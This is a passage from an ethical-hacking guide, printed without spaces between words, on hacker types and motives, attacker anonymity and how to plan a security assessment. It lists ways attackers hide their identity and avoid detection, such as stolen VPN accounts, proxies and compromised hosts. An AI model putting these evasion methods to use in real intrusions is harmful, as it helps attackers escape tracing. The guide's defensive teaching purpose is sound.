Criminalhackers:Oftenreferredtoas“crackers,”theseareskilledcriminalexpertswhowritesomeofthehackingtools,includingthescriptsandotherprogramsthatthescriptkiddiesandsecurityprofessionalsuse.Thesefolksalsowritemalwaretocarryouttheirexploitsfromtheothersideoftheworld.Theycanbreakintonetworksandcomputersandcovertheirtracks.Theycanevenmakeitlooklikesomeoneelsehackedtheirvictims’systems.Sometimes,peoplewithillintentmaynotbedoingwhat’sconsidered“hacking,”butnevertheless,they’reabusingtheirprivilegesorsomehowgainingunauthorizedaccess—suchasthe2015incidentinvolvingMajorLeagueBaseball’sSt.LouisCardinalsandHoustonAstros.Thus,themediaglorifiesitallas“hacking.”
Advancedhackersareoftenmembersofcollectivesthatprefertoremainnameless.Thesehackersareverysecretiveandshareinformationwiththeirsubordinates(lower-rankedhackersinthecollectives)onlywhentheyaredeemedworthy.Typically,forlower-rankedhackerstobeconsideredworthy,theymustpossesssomeuniqueinformationortakethegang-likeapproachandprovethemselvesthroughahigh-profilehack.ThesehackersarearguablysomeofyourworstenemiesinIT.(Okay,maybethey’renotasbadasuntrainedandcarelessusers,butclose.)Byunderstandingcriminalhackerbehavioryouaresimplybeingproactive—findingproblemsbeforetheybecomeproblems.
Securityresearchers:Thesepeoplearehighlytechnicalandpubliclyknownsecurityexpertswhonotonlymonitorandtrackcomputer,network,andapplication
vulnerabilitiesbutalsowritethetoolsandothercodetoexploitthem.Iftheseguysdidn’texist,securityprofessionalswouldn’thavemuchinthewayofopensourceandevencertaincommercialsecuritytestingtools.Ifollowmanyofthesesecurityresearchersonaweeklybasisviatheirblogs,Twitter,andarticles,andyoushould,too.Youcanreviewmyblog(http://securityonwheels.blogspot.com),andIlistothersourcesthatyoucanbenefitfromintheAppendix.Followingtheprogressofthesesecurityresearchershelpsyoustayup-to-dateonbothvulnerabilitiesandthelatestandgreatestsecuritytools.IlistthetoolsandrelatedresourcesfromvarioussecurityresearchersintheAppendixandthroughoutthebook.
Therearegood-guy(whitehat)andbad-guy(blackhat)hackers.Grayhathackersarealittlebitofboth.Therearealsoblue-hathackerswhoareinvitedbysoftwaredeveloperstofindsecurityflawsintheirsystems.
IoncesawastudyfromtheBlackHatsecurityconferencethatfoundthateverydayITprofessionalsevenengageinmaliciousandcriminalactivityagainstothers.AndpeoplewonderwhyITdoesn’tgettherespectitdeserves!Perhapsthisgroupwillevolveintoafourthgeneralcategoryofhackersinthecomingyears.
Regardlessofageandcomplexion,hackerspossesscuriosity,bravado,andoftenverysharpminds.
Perhapsmoreimportantthanahacker’sskilllevelishisorhermotivation:
Hacktiviststrytodisseminatepoliticalorsocialmessagesthroughtheirwork.Ahacktivistwantstoraisepublicawarenessofanissueyettheywanttoremainanonymous.Inmanysituations,thesehackerswilltrytotakeyoudownifyouexpressaviewthat’scontrarytotheirs.ExamplesofhacktivismarethewebsitesthatweredefacedwiththeFreeKevinmessagesthatpromotedfreeingKevinMitnickfromprisonforhisfamoushackingescapades.Otherscasesofhacktivismincludemessagesaboutlegalizingdrugs,protestsagainstthewar,protestscenteredaroundwealthenvyandbigcorporations,andjustaboutanyothersocialandpoliticalissueyoucanthinkof.Cyberterrorists(bothorganizedandunorganized,oftenbackedbygovernmentagencies)attackcorporateorgovernmentcomputersandpublicutilityinfrastructures,suchaspowergridsandair-trafficcontroltowers.Theycrashcriticalsystems,stealclassifieddata,orexposethepersonalinformationofgovernmentemployees.Countriestakethethreatsthesecyberterroristsposesoseriouslythatmanymandateinformationsecuritycontrolsincrucialindustries,suchasthepowerindustry,toprotectessentialsystemsagainsttheseattacks.HackersforhirearepartoforganizedcrimeontheInternet.ManyofthesehackershireoutthemselvesortheirDoS-creatingbotnetsformoney—andlotsofit!
Criminalhackersareintheminority,sodon’tthinkthatyou’reupagainstmillionsofthesevillains.Likethee-mailspamkingsoftheworld,manyofthenefariousactsfrommembersofcollectivesthatprefertoremainnamelessarecarriedoutbyasmallnumberofcriminals.Manyotherhackersjustlovetotinkerandonlyseekknowledgeofhowcomputersystemswork.Oneofyourgreatestthreatsworksinsideyourbuildingandhasanaccessbadgetothebuildingandavalidnetworkaccount,sodon’tdiscounttheinsiderthreat.
WhyTheyDoItHackershackbecausetheycan.Period.Okay,itgoesalittledeeperthanthat.Hackingisacasualhobbyforsomehackers—theyhackjusttoseewhattheycanandcan’tbreakinto,usuallytestingonlytheirownsystems.Thesearen’tthefolksIwriteaboutinthisbook.Ifocusonthosehackerswhoareobsessiveaboutgainingnotorietyordefeatingcomputersystems,andthosewhohavecriminalintentions.
ManyhackersgetakickoutofoutsmartingcorporateandgovernmentITandsecurityadministrators.Theythriveonmakingheadlinesandbeingnotorious.Defeatinganentityorpossessingknowledgethatfewotherpeoplehavemakesthemfeelbetteraboutthemselves,buildingtheirself-esteem.Manyofthesehackersfeedofftheinstantgratificationofexploitingacomputersystem.Theybecomeobsessedwiththisfeeling.Somehackerscan’tresisttheadrenalinerushtheygetfrombreakingintosomeoneelse’ssystems.Often,themoredifficultthejobis,thegreaterthethrillisforhackers.
It’sabitironicgiventheircollectivetendenciesbuthackersoftenpromoteindividualism—oratleastthedecentralizationofinformation—becausemanybelievethatallinformationshouldbefree.Theythinktheirattacksaredifferentfromattacksintherealworld.Hackersmayeasilyignoreormisunderstandtheirvictimsandtheconsequencesofhacking.Theydon’tthinklong-termaboutthechoicesthey’remakingtoday.Manyhackerssaytheydon’tintendtoharmorprofitthroughtheirbaddeeds,abeliefthathelpsthemjustifytheirwork.Manydon’tlookfortangiblepayoffs.Justprovingapointisoftenasufficientrewardforthem.Thewordsociopathcomestomind.
Theknowledgethatmaliciousattackersgainandtheself-esteemboostthatcomesfromsuccessfulhackingmightbecomeanaddictionandawayoflife.Someattackerswanttomakeyourlifemiserable,andotherssimplywanttobeseenorheard.Somecommonmotivesarerevenge,basicbraggingrights,curiosity,boredom,challenge,vandalism,theftforfinancialgain,sabotage,blackmail,extortion,corporateespionage,andjustgenerallyspeakingoutagainst“theman.”Hackersregularlycitethesemotivestoexplaintheirbehavior,butthesemotivationstendtobecitedmorecommonlyduringdifficulteconomicconditions.
Malicioususersinsideyournetworkmaybelookingtogaininformationtohelpthemwithpersonalfinancialproblems,togivethemalegupoveracompetitor,toseekrevengeontheiremployers,tosatisfytheircuriosity,ortorelieveboredom.
Manybusinessownersandmanagers—evensomenetworkandsecurityadministrators—believethattheydon’thaveanythingthatahackerwantsorthathackerscan’tdomuchdamageiftheybreakin.They’resorelymistaken.Thisdismissivekindofthinkinghelpssupportthebadguysandpromotetheirobjectives.Hackerscancompromiseaseeminglyunimportantsystemtoaccessthenetworkanduseitasalaunchingpadforattacksonothersystems,andmany
peoplewouldbenonethewiserbecausetheydon’thavethepropercontrolstopreventanddetectmalicioususe.
Rememberthathackersoftenhacksimplybecausetheycan.Somehackersgoforhigh-profilesystems,buthackingintoanyone’ssystemhelpsthemfitintohackercircles.Hackersexploitmanypeople’sfalsesenseofsecurityandgoforalmostanysystemtheythinktheycancompromise.Electronicinformationcanbeinmorethanoneplaceatthesametime,soifhackersmerelycopyinformationfromthesystemstheybreakinto,it’stoughtoprovethathackerspossessthatinformationandit’simpossibletogetitback.
Similarly,hackersknowthatasimpledefacedwebpage—howevereasilyattacked—isnotgoodforsomeoneelse’sbusiness.Itoftentakesalarge-scaledatabreach;however,hackedsitescanoftenpersuademanagementandothernonbelieverstoaddressinformationthreatsandvulnerabilities.
Manyrecentstudieshaverevealedthatmostsecurityflawsareverybasicinnature.That’sexactlywhatIseeinmyinformationsecurityassessments.Icallthesebasicflawsthelow-hangingfruitofthenetworkjustwaitingtobeexploited.Computerbreachescontinuetogeteasiertoexecuteyethardertopreventforseveralreasons:
WidespreaduseofnetworksandInternetconnectivityAnonymityprovidedbycomputersystemsworkingovertheInternetandoftenontheinternalnetwork(becauseeffectivelogging,monitoring,andalertingrarelytakesplace)GreaternumberandavailabilityofhackingtoolsLargenumberofopenwirelessnetworksthathelphackerscovertheirtracksGreatercomplexityofnetworksandthecodebasesintheapplicationsanddatabasesbeingdevelopedtodayComputer-savvychildrenUnlikelinessthatattackerswillbeinvestigatedorprosecutedifcaught
AmalicioushackeronlyneedstofindonesecurityholewhereasITandsecurityprofessionalsandbusinessownersmustfindandblockthemall!
Althoughmanyattacksgounnoticedorunreported,criminalswhoarediscoveredareoftennotpursuedorprosecuted.Whenthey’recaught,hackersoftenrationalizetheirservicesasbeingaltruisticandabenefittosociety:They’remerelypointingoutvulnerabilitiesbeforesomeoneelsedoes.Regardless,ifhackersarecaughtandprosecuted,the“fameandglory”rewardsystemthathackersthriveonisthreatened.
Thesamegoesformalicioususers.Typically,theircriminalactivitygoesunnoticed,butifthey’recaught,thesecuritybreachmaybekepthush-hushinthenameofshareholdervalueornotwantingtoruffleanycustomerorbusinesspartnerfeathers.
However,informationsecurityandprivacylawsandregulationsarechangingthisbecauseinmostsituationsbreachnotificationisrequired.Sometimes,thepersonisfiredoraskedtoresign.Althoughpubliccasesofinternalbreachesarebecomingmorecommon(usuallythroughbreachdisclosurelaws),thesecasesdon’tgiveafullpictureofwhat’sreallytakingplaceintheaverageorganization.
Whetherornottheywantto,mostexecutivesnowhavetodealwithallthestate,federal,andinternationallawsandregulationsthatrequirenotificationsofbreachesorsuspectedbreachesofsensitiveinformation.Thisappliestoexternalhacks,internalbreaches,andevensomethingasseeminglybenignasalostmobiledeviceorbackuptapes.TheAppendixcontainsURLstotheinformationsecurityandprivacylawsandregulationsthatmayaffectyourbusiness.
Hackinginthenameofliberty?Manyhackersexhibitbehaviorsthatcontradicttheirstatedpurposes—thatis,theyfightforcivillibertiesandwanttobeleftalone,whileatthesametime,theylovepryingintothebusinessofothersandcontrollingtheminanywaypossible.Manyhackerscallthemselvescivillibertariansandclaimtosupporttheprinciplesofpersonalprivacyandfreedom.However,theycontradicttheirwordsbyintrudingontheprivacyandpropertyofothers.Theyoftenstealthepropertyandviolatetherightsofothers,butarewillingtogotogreatlengthstogettheirownrightsbackfromanyonewhothreatensthem.It’sliveandletlivegoneawry.
ThecaseinvolvingcopyrightedmaterialsandtheRecordingIndustryAssociationofAmerica(RIAA)isaclassicexample.Hackershavegonetogreatlengthstoproveapoint,fromdefacingthewebsitesoforganizationsthatsupportcopyrightsandthenendupillegallysharingmusicandsoftwarethemselves.Gofigure.
PlanningandPerformingAttacksAttackstylesvarywidely:
Somehackerspreparefarinadvanceofanattack.Theygathersmallbitsofinformationandmethodicallycarryouttheirhacks,asIoutlineinChapter4.Thesehackersarethemostdifficulttotrack.Otherhackers—usuallytheinexperiencedscriptkiddies—actbeforetheythinkthroughtheconsequences.Suchhackersmaytry,forexample,totelnetdirectlyintoanorganization’srouterwithouthidingtheiridentities.OtherhackersmaytrytolaunchaDoSattackagainstaMicrosoftExchangeserverwithoutfirstdeterminingtheversionofExchangeorthepatchesthatareinstalled.Thesehackersusuallyarecaught,oratleastblocked.Malicioususersarealloverthemap.SomecanbequitesavvybasedontheirknowledgeofthenetworkandofhowITandsecurityoperatesinsidetheorganization.Othersgopokingandproddingaroundintosystemstheyshouldn’tbein—orshouldn’thavehadaccesstointhefirstplace—andoftendostupidthingsthatleadsecurityornetworkadministratorsbacktothem.
Althoughthehackerundergroundisacommunity,manyofthehackers—especiallyadvancedhackers—don’tshareinformationwiththecrowd.Mosthackersdomuchoftheirworkindependentlyinordertoremainanonymous.
Hackerswhonetworkwithoneanotheroftenuseprivatemessageboards,anonymouse-mailaddresses,hackerwebsites,andInternetRelayChat(IRC).Youcanlogintomanyofthesesitestoseewhathackersaredoing.
Whateverapproachtheytake,mostmaliciousattackerspreyonignorance.Theyknowthefollowingaspectsofreal-worldsecurity:
Themajorityofcomputersystemsaren’tmanagedproperly.Thecomputersystemsaren’tproperlypatched,hardened,ormonitored.Attackerscanoftenflybelowtheradaroftheaveragefirewallorintrusionpreventionsystem(IPS).Thisisespeciallytrueformalicioususerswhoseactionsareoftennotmonitoredatallwhile,atthesametime,theyhavefullaccesstotheveryenvironmenttheycanexploit.Mostnetworkandsecurityadministratorssimplycan’tkeepupwiththedelugeofnewvulnerabilitiesandattackmethods.Thesepeopleoftenhavetoomanytaskstostayontopofandtoomanyotherfirestoputout.Networkandsecurityadministratorsmayalsofailtonoticeorrespondtosecurityeventsbecauseofpoortimeandgoalmanagement.IprovideresourcesontimeandgoalmanagementforITandsecurityprofessionalsintheAppendix.
Informationsystemsgrowmorecomplexeveryyear.Thisisyetanotherreasonwhyoverburdenedadministratorsfinditdifficulttoknowwhat’shappeningacrossthewireandontheharddrivesofalltheirsystems.Virtualization,cloudservices,andmobiledevicessuchaslaptops,tablets,andphonesaremakingthingsexponentiallyworse.
Timeisanattacker’sfriend—andit’salmostalwaysonhisorherside.Byattackingthroughcomputersratherthaninperson,hackershavemorecontroloverthetimingfortheirattacks:
Attackscanbecarriedoutslowly,makingthemhardtodetect.Attacksarefrequentlycarriedoutaftertypicalbusinesshours,ofteninthemiddleofthenight,andfromhome,inthecaseofmalicioususers.Defensesareoftenweakerafterhours—withlessphysicalsecurityandlessintrusionmonitoring—whenthetypicalnetworkadministrator(orsecurityguard)issleeping.
Ifyouwantdetailedinformationonhowsomehackersworkorwanttokeepupwiththelatesthackermethods,severalmagazinesareworthcheckingout:
2600—TheHackerQuarterlymagazine(www.2600.com)(IN)SECUREmagazine(www.net-security.org/insecuremag.php)Hackin9(http://hakin9.org)PHRACK(www.phrack.org/archives)
Maliciousattackersusuallylearnfromtheirmistakes.Everymistakemovesthemonestepclosertobreakingintosomeone’ssystem.Theyusethisknowledgewhencarryingoutfutureattacks.You,asasecurityprofessionalresponsiblefortestingthesecurityofyourenvironment,needtodothesame.
MaintainingAnonymitySmartattackerswanttoremainaslow-keyaspossible.Coveringtheirtracksisapriority,andmanytimestheirsuccessdependsonthemremainingunnoticed.Theywanttoavoidraisingsuspicionsotheycancomebackandaccessthesystemsinthefuture.Hackersoftenremainanonymousbyusingoneofthefollowingresources:
BorrowedorstolenremotedesktopandVPNaccountsfromfriendsorpreviousemployersPubliccomputersatlibraries,schools,orkiosksatthelocalmallOpenwirelessnetworksInternetproxyserversoranonymizerservicesAnonymousordisposablee-mailaccountsfromfreee-mailservicesOpene-mailrelaysInfectedcomputers—alsocalledzombiesorbots—atotherorganizationsWorkstationsorserversonthevictim’sownnetwork
Ifhackersuseenoughsteppingstonesfortheirattacks,theyarehard—practicallyimpossible—totrace.Luckily,oneofyourbiggestconcerns—themalicioususer—generallyisn’tquiteassavvy.Thatis,unlesstheuserisanactualnetworkorsecurityadministrator.
DevelopingYourEthicalHackingPlanInThisChapter
Settingsecuritytestinggoals
Selectingwhichsystemstotest
Developingyourtestingstandards
Examininghackingtools
Asaninformationsecurityprofessional,youmustplanyoursecurityassessmenteffortsbeforeyoustart.Adetailedplandoesn’tmeanthatyourtestingmustbeelaborate.Itjustmeansthatyou’reclearandconciseaboutwhattodo.Giventheseriousnessofethicalhacking,youshouldmakethisprocessasstructuredaspossible.
Evenifyoutestonlyasinglewebapplicationorworkgroupofcomputers,besuretotakethecriticalstepsofestablishingyourgoals,defininganddocumentingthescopeofwhatyou’llbetesting,determiningyourtestingstandards,andgatheringandfamiliarizingyourselfwiththepropertoolsforthetask.Thischaptercoversthesestepstohelpyoucreateapositiveenvironmentsoyoucansetyourselfupforsuccess.
Doyouneedinsurance?Ifyou’reanindependentconsultantorhaveabusinesswithateamofsecurityassessmentprofessionals,considergettingprofessionalliabilityinsurance(alsoknownaserrorsandomissionsinsurance)fromanagentwhospecializesinbusinessinsurancecoverage.Thiskindofinsurancecanbeexpensivebutwillbewellworththeexpenseifsomethinggoesawryandyouneedprotection.Manycustomersevenrequiretheinsurancebeforethey’llhireyoutodothework.
EstablishingYourGoalsYoucan’thitatargetyoucan’tsee.Yourtestingplanneedsgoals.Themaingoalofethicalhackingistofindvulnerabilitiesinyoursystemsfromtheperspectiveofthebadguyssoyoucanmakeyourenvironmentmoresecure.Youcanthentakethisastepfurther:
Definemorespecificgoals.Alignthesegoalswithyourbusinessobjectives.Whatareyouandthemanagementtryingtogetfromthisprocess?Whatperformancecriteriawillyouusetoensureyou’regettingthemostoutofyourtesting?Createaspecificschedulewithstartandenddatesaswellasthetimesyourtestingistotakeplace.Thesedatesandtimesarecriticalcomponentsofyouroverallplan.
Beforeyoubeginanytesting,youabsolutely,positivelyneedeverythinginwritingandapproved.Documenteverythingandinvolvemanagementinthisprocess.Yourbestallyinyourtestingeffortsisamanagerwhosupportswhatyou’redoing.
Thefollowingquestionscanstarttheballrollingwhenyoudefinethegoalsforyourethicalhackingplan:
DoesyourtestingsupportthemissionofthebusinessanditsITandsecuritydepartments?Whatbusinessgoalsaremetbyperformingethicalhacking?Thesegoalsmayincludethefollowing:
WorkingthroughStatementonStandardsforAttestationEngagements(SSAE)16auditsMeetingfederalregulationssuchastheHealthInsurancePortabilityandAccountabilityAct(HIPAA)andthePaymentCardIndustryDataSecurityStandard(PCIDSS)MeetingcontractualrequirementsofclientsorbusinesspartnersMaintainingthecompany’simagePreppingfortheinternationallyacceptedsecuritystandardofISO/IEC27001:2013
Howwillthistestingimprovesecurity,IT,andthebusinessasawhole?Whatinformationareyouprotecting?Thiscouldbepersonalhealthinformation,intellectualproperty,confidentialclientinformation,oremployees’privateinformation.Howmuchmoney,time,andeffortareyouandyourorganizationwillingto
spendonsecurityassessments?Whatspecificdeliverableswilltherebe?Deliverablescanincludeanythingfromhigh-levelexecutivereportstodetailedtechnicalreportsandwrite-upsonwhatyoutested,alongwiththeoutcomesofyourtests.Youcandeliverspecificinformationthatisgleanedduringyourtesting,suchaspasswordsandotherconfidentialinformation.Whatspecificoutcomesdoyouwant?Desiredoutcomesincludethejustificationforhiringoroutsourcingsecuritypersonnel,increasingyoursecuritybudget,meetingcompliancerequirements,orenhancingsecuritysystems.
Afteryouknowyourgoals,documentthestepstogetthere.Forexample,ifonegoalistodevelopacompetitiveadvantagetokeepexistingcustomersandattractnewones,determinetheanswerstothesequestions:
Whenwillyoustartyourtesting?Willyourtestingapproachbeblind,inwhichyouknownothingaboutthesystemsyou’retesting,orknowledge-based,inwhichyou’regivenspecificinformationaboutthesystemsyou’retesting,suchasIPaddresses,hostnames,andevenusernamesandpasswords?Irecommendthelatter.Willyourtestingbetechnicalinnature,involvephysicalsecurityassessments,orevenusesocialengineering?Willyoubepartofalargerethicalhackingteam,sometimescalledatigerteamorredteam?
Willyounotifytheaffectedpartiesofwhatyou’redoingandwhenyou’redoingit?Ifso,how?
Customernotificationisacriticalissue.Manycustomersappreciatethatyou’retakingstepstoprotecttheirinformation.Approachthetestinginapositiveway.Don’tsay,“We’rebreakingintoourownsystemstoseewhatinformationisvulnerabletohackers,”evenifthat’swhatyou’redoing.Instead,saythatyou’reassessingtheoverallsecurityofyournetworkenvironmentsotheinformationwillbeassecureaspossible.
Howwillyouknowwhethercustomersevencareaboutwhatyou’redoing?Howwillyounotifycustomersthattheorganizationistakingstepstoenhancethesecurityoftheirinformation?Whatmeasurementscanensurethattheseeffortsarepayingoff?
Establishingyourgoalstakestime,butyouwon’tregretit.Thesegoalsareyourroadmap.Ifyouhaveanyconcerns,refertothesegoalstomakesurethatyoustayontrack.AdditionalresourcesongoalsettingandmanagementcanbefoundintheAppendix.
DeterminingWhichSystemstoHackAfteryou’veestablishedyouroverallgoals,decidewhichsystemstotest.Youprobablydon’twant—orneed—toassessthesecurityofallyoursystemsatthesametime.Assessingthesecurityofallyoursystemscouldbequiteanundertakingandmightleadtoproblems.I’mnotrecommendingthatyoudon’teventuallyassesseverycomputerandapplicationyouhave.I’mjustsuggestingthatwheneverpossible,youshouldbreakyourprojectsintosmallerchunkstomakethemmoremanageable.Youmightdecidewhichsystemstotestbasedonahigh-levelriskanalysis,answeringquestionssuchas
Whatareyourmostcriticalsystems?Whichsystems,ifaccessedwithoutauthorization,wouldcausethemosttroubleorsufferthegreatestlosses?Whichsystemsappearmostvulnerabletoattack?Whichsystemscrashthemost?Whichsystemsarenotdocumented,arerarelyadministered,oraretheonesyouknowtheleastabout?
Thefollowinglistincludesdevices,systems,andapplicationsthatyoumayconsiderperformingyourhackingtestson:
RoutersandswitchesFirewallsWirelessaccesspointsWebapplications(bothinternalandhostedinthecloud)ApplicationanddatabaseserversE-mailandfileserversMobiledevices(suchasphonesandtablets)thatstoreconfidentialinformationPhysicalsecuritycamerasandaccesscontrolsystemsSCADAandindustrialcontrolsystemsWorkstationandserveroperatingsystems
Whatspecificsystemsyoushouldtestdependsonseveralfactors.Ifyouhaveasmallnetwork,youcantesteverything.Considertestingjustpublic-facinghostssuchase-mailandwebserversandtheirassociatedapplications.Theethicalhackingprocessisflexible.Basethesedecisionsonwhatmakesthemostbusinesssense.
Startwiththemostvulnerablesystemsandconsiderthesefactors:
WhetherthecomputerorapplicationresidesonthenetworkorinthecloudWhichoperatingsystemandapplication(s)thesystemruns
AttacktreeanalysisAttacktreeanalysisistheprocessofcreatingaflowchart-typemappingofhowmaliciousattackerswouldattackasystem.Attacktreesaretypicallyusedinhigher-levelinformationriskanalysesandbysecurity-savvydevelopmentteamswhenplanningoutanewsoftwareproject.Ifyoureallywanttotakeyoursecuritytestingtothenextlevelbythoroughlyplanningyourattacks,workingverymethodically,andbeingmoreprofessionaltoboot,thenattacktreeanalysisisjustthetoolyouneed.
Theonlydrawbackisthatattacktreescantakeconsiderabletimetodrawoutandrequireafairamountofexpertise.Whysweatit,though,whenyoucanuseacomputertodoalotoftheworkforyou?AcommercialtoolcalledSecurITree,byAmenazaTechnologiesLimited(www.amenaza.com),specializesinattacktreeanalysis,andyoumayconsideraddingittoyourtoolbox.Ofcourse,youcouldalsouseMicrosoftVisioorSmartDraw(www.smartdraw.com).ThefollowingfigureshowsasampleSecurITreeattacktreeanalysis.
Aprevioussecurityriskassessment,vulnerabilitytest,orbusinessimpactanalysismayalreadyhavegeneratedanswerstotheprecedingquestions.Ifso,thatdocumentationcanhelpidentifysystemsforfurthertesting.BowTieandFailureModesandEffectsAnalysis(FMEA)areadditionalapproaches.
Ethicalhackinggoesafewstepsdeeperthanhigher-levelinformationriskassessmentsand,especially,vulnerabilityscans.Withethicalhacking,youoftenstartbygleaninginformationonallsystems—includingtheorganizationasawhole—andthenfurtherassessingthemostvulnerablesystems.Butagain,thisprocessisflexible.IdiscusstheethicalhackingmethodologyinChapter4.
Anotherfactorthatwillhelpyoudecidewheretostartistoassessthesystemsthathavethegreatestvisibility.Forexample,focusingonadatabaseorfileserverthatstoresclientorothercriticalinformationmaymakemoresense—atleastinitially—thanconcentratingonafirewallorwebserverthathostsmarketinginformationaboutthe
CreatingTestingStandardsOnemiscommunicationorslip-upcansendthesystemscrashingduringyourethicalhackingtests.Noonewantsthattohappen.Topreventmishaps,developanddocumenttestingstandards.Thesestandardsshouldinclude
Whenthetestsareperformed,alongwiththeoveralltimelineWhichtestsareperformedHowmuchknowledgeofthesystemsyouacquireinadvanceHowthetestsareperformedandfromwhatsourceIPaddresses(ifperformedviaanexternalsourceviatheInternet)Whatyoudowhenamajorvulnerabilityisdiscovered
Thisisalistofgeneralbestpractices—youcanapplymorestandardsforyoursituation.Thefollowingsectionsdescribethesegeneralbestpracticesinmoredetail.
TimingTheysaythatit’s“allinthetiming.”Thisisespeciallytruewhenperformingsecuritytests.Makesurethatthetestsyouperformminimizedisruptiontobusinessprocesses,informationsystems,andpeople.Youwanttoavoidharmfulsituationssuchasmiscommunicatingthetimingoftestsandcausingadenialofservice(DoS)attackagainstahigh-traffice-commercesiteinthemiddleofthedayorperformingpassword-crackingtestsinthemiddleofthenight.It’samazingwhata12-hourtimedifference(2p.m.duringmajorproductionversus2a.m.duringaslowerperiod)canmakewhentestingyoursystems!Evenhavingpeopleindifferenttimezonescancreateissues.Everyoneontheprojectneedstoagreeonadetailedtimelinebeforeyoubegin.Havingtheteammembers’agreementputseveryoneonthesamepageandsetscorrectexpectations.
Ifpossibleandpractical,notifyyourInternetserviceproviders(ISPs),cloudserviceproviders,orhostingcollocation(colo)providers.Thesecompanieshavefirewallsorintrusionpreventionsystems(IPS)inplacetodetectmaliciousbehavior.Ifyourproviderknowsyou’reconductingtests,it’slesslikelytoblockyourtraffic.
Yourtestingtimelineshouldincludespecificshort-termdatesandtimesofeachtest,thestartandenddates,andanyspecificmilestonesinbetween.YoucandevelopandenteryourtimelineintoasimplespreadsheetorGanttchart,orinalargerprojectplan.Atimelinesuchasthefollowingkeepsthingssimpleandprovidesareferenceduringtesting:
TestPerformed StartTime ProjectedEndTime
Webapplicationvulnerabilityscanning July1,21:00 July2,07:00
OSvulnerabilityscanning July2,10:00 July3,02:00
OSvulnerabilityexploitation July3,08:00 July3,17:00
RunningspecifictestsYoumighthavebeenchargedwithperformingageneralpenetrationtest,oryoumaywanttoperformspecifictests,suchascrackingpasswordsortryingtogainaccesstoawebapplication.OryoumightbeperformingasocialengineeringtestorassessingWindowsonthenetwork.Howeveryoutest,youmightnotwanttorevealthespecificsofthetesting.Evenwhenyourmanagerorclientdoesn’trequiredetailedrecordsofyourtests,documentwhatyou’redoingatahighlevel.Documentingyourtestingcanhelpeliminateanypotentialmiscommunicationandkeepyououtofhotwater.Itmightalsobeneededasevidenceshouldyouuncovermalfeasance.
Enablingloggingonthesystemsyoutestalongwiththetoolsyouusecanprovideevidenceofwhatandwhenyoutestandmore.Itmaybeoverkill,butyoucouldevenrecordscreenactionsusingatoolsuchasTechSmith’sCamtasiaStudio(www.techsmith.com/camtasia.html).
Sometimes,youmightknowthegeneralteststhatyouperform,butifyouuseautomatedtools,itmaybenexttoimpossibletounderstandeverytestyouperformcompletely.Thisisespeciallytruewhenthesoftwareyou’reusingreceivesreal-timevulnerabilityupdatesandpatchesfromthevendoreachtimeyourunit.Thepotentialforfrequentupdatesunderscorestheimportanceofreadingthedocumentationandreadmefilesthatcomewiththetoolsyouuse.
Anupdatedprogramoncebitme.Iwasperformingavulnerabilityscanonaclient’swebsite—thesametestIperformedthepreviousweek.TheclientandIhadscheduledthetestdateandtimeinadvance.ButIdidn’tknowthatthesoftwarevendormadesomechangestoitswebformsubmissiontests,andIaccidentallyfloodedtheclient’swebapplication,creatingaDoScondition.
Luckily,thisDoSconditionoccurredafterbusinesshoursanddidn’taffecttheclient’soperations.However,theclient’swebapplicationwascodedtogenerateane-mailforeveryformsubmissionandtherewasnoCAPTCHAonthepagetolimitsuccessivesubmissions.Theapplicationdeveloperandcompany’spresidentreceived4,000e-mailsintheirinboxeswithinabout10minutes—ouch!
Myexperienceisaperfectexampleofnotknowinghowmytoolwasconfiguredbydefaultandwhatitwoulddointhatsituation.Iwasluckythatthepresidentwastech-savvyandunderstoodthesituation.Remembertohaveacontingencyplanincaseasituationlikemineoccurs.Justasimportant,setpeople’sexpectationsthattroublecan
occur—evenwhenyou’vetakenalltherightstepstoensureeverything’sincheck.
BlindversusknowledgeassessmentsHavingsomeknowledgeofthesystemsyou’retestingisgenerallythebestapproach,butit’snotrequired.Havingabasicunderstandingofthesystemsyouhackcanprotectyouandothers.Obtainingthisknowledgeshouldn’tbedifficultifyou’retestingyourownin-housesystems.Ifyou’retestingaclient’ssystems,youmighthavetodigalittledeeperintohowthesystemsworksoyou’refamiliarwiththem.DoingsohasalwaysbeenmypracticeandI’veonlyhadasmallnumberofclientsaskforafullblindassessmentbecausemostpeoplearescaredofthem.Thisdoesn’tmeanthatblindassessmentsaren’tvaluable,butthetypeofassessmentyoucarryoutdependsonyourspecificneeds.
Thebestapproachistoplanonunlimitedattacks,whereinanytestisfairgame,possiblyevenincludingDoStesting.Thebadguysaren’tpokingaroundonyoursystemswithinalimitedscope,sowhyshouldyou?
Considerwhetherthetestsshouldbeperformedsothatthey’reundetectedbynetworkadministratorsandanymanagedsecurityserviceprovidersorrelatedvendors.Thoughnotrequired,thispracticeshouldbeconsidered,especiallyforsocialengineeringandphysicalsecuritytests.IoutlinespecifictestsforthosesubjectsinChapters6and7.
Iftoomanyinsidersknowaboutyourtesting,theymightcreateafalsesenseofvigilancebyimprovingtheirhabits,whichcanendupnegatingthehardworkyouputintothetesting.Thisdoesn’tmeanyoushouldn’ttellanyone.It’salmostalwaysagoodideatoinformtheownerofthesystemwhomaynotbeyoursponsor.Alwayshaveamainpointofcontact—preferablysomeonewithdecision-makingauthority.
PickingyourlocationThetestsyouperformdictatewhereyoumustrunthemfrom.Yourgoalistotestyoursystemsfromlocationsaccessiblebymalicioushackersorinsiders.Youcan’tpredictwhetheryou’llbeattackedbysomeoneinsideoroutsideyournetwork,socoverallyourbasesasmuchasyoucan.Combineexternal(publicInternet)testsandinternal(privateLAN)tests.
Youcanperformsometests,suchaspasswordcrackingandnetworkinfrastructureassessments,fromyouroffice.Forexternalteststhatrequirenetworkconnectivity,youmighthavetogooffsite(agoodexcusetoworkfromhome),useanexternalproxyserver,orsimplyuseguestWi-Fi.Somesecurityvendors’vulnerabilityscannerscanevenberunfromthecloud,sothatwouldworkaswell.Betteryet,ifyoucanassignanavailablepublicIPaddresstoyourcomputer,simplyplugintothenetworkontheoutsideofthefirewallforahacker’s-eyeviewofyoursystems.Internaltestsareeasybecauseyouneedonlyphysicalaccesstothebuildingandthenetwork.Youmightbe
abletouseaDSLlineorcablemodemalreadyinplaceforvisitorsandguestaccess.
RespondingtovulnerabilitiesyoufindDetermineaheadoftimewhetheryou’llstoporkeepgoingwhenyoufindacriticalsecurityhole.Youdon’tneedtokeeptestingforever.Justfollowthepathyou’reonuntilyou’vemetyourobjectivesorreachedyourgoals.Whenindoubt,thebestthingtodoistohaveaspecificgoalinmindandthenstopwhenthatgoalhasbeenmet.
Ifyoudon’thavegoals,howareyougoingtoknowwhenyouarriveatyoursecuritytestingdestination?
